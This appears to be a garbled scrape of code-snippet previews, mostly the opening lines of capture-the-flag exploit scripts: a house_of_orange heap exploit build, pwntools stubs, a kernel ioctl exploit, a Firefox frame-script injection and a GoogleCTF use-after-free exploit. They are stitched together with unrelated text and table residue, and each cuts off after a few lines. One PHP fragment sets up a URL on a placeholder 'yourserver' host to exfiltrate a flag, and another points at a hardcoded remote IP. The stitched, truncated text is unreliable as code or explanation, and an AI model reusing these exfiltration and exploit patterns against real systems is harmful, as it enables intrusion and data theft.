Let's make a disassembler — an easier one.
A template built for simplicity; let's keep it simple.
mov $reg, $reg
#!/usr/bin/env python2 | |
from pwn import * | |
### | |
# Debug mode is on only when the script is launched with no extra
# command-line arguments (sys.argv holds just the script name).
DEBUG = len(sys.argv) <= 1
$ gcc house_of_orange.c -o house_of_orange | |
house_of_orange.c: In function ‘main’: | |
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
^ | |
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x30) = -1; | |
^ | |
$ ./house_of_orange |
<?php | |
// Base URL the script points at; loopback here, i.e. the local host only.
$target = 'http://127.0.0.1/';
// Where exploit.php is served from; 'yourserver' is a placeholder host name.
$exploit = 'http://yourserver:1337/exploit.php';
// URL prefix the flag value is appended to; same placeholder host.
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) { | |
$res = ''; | |
for ($i = 0; $i < strlen($s); $i++) { | |
$res .= '\\' . dechex(ord($s[$i])); | |
} |
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh ) |
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
# p = Pwn(mode=1,port=8887) | |
p = Pwn(mode=1,host='52.193.196.17',port=56746) | |
def select(op): | |
p.read_until('Your choice: ') |
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <sys/wait.h> | |
#include <sys/ioctl.h> | |
#include <pthread.h> | |
#define ALLOC_CTX _IO('t', 1) |
from ctypes import c_ssize_t, c_void_p, c_int, c_void_p, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL | |
from PyQt5.QtCore import Qt, QTimer, QObject | |
from PyQt5.QtGui import QResizeEvent, QFocusEvent | |
from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp | |
import os | |
import sys | |
import idaapi | |
import idc |
/* inject via | |
ppmm.loadFrameScript("data:,<js source>", true); | |
(where ppmm is the message manager, e.g. in shell.js) | |
The frame-script documentation explains why this works [1], and
the message-manager docs [2] explain that the parent-process
manager, defined as ppmm in shell.js [3], can be used.
[1] https://developer.mozilla.org/en-US/Firefox/Multiprocess_Firefox/Frame_script_loading_and_lifetime |
#!/usr/bin/env python3 | |
# | |
# Exploit for "assignment" of GoogleCTF 2017 | |
# | |
# CTF-quality exploit... | |
# | |
# Slightly simplified and shortened explanation: | |
# | |
# The bug is a UAF of one or both values during add_assign() if a GC is | |
# triggered during allocate_value(). The exploit first abuses this to leak a |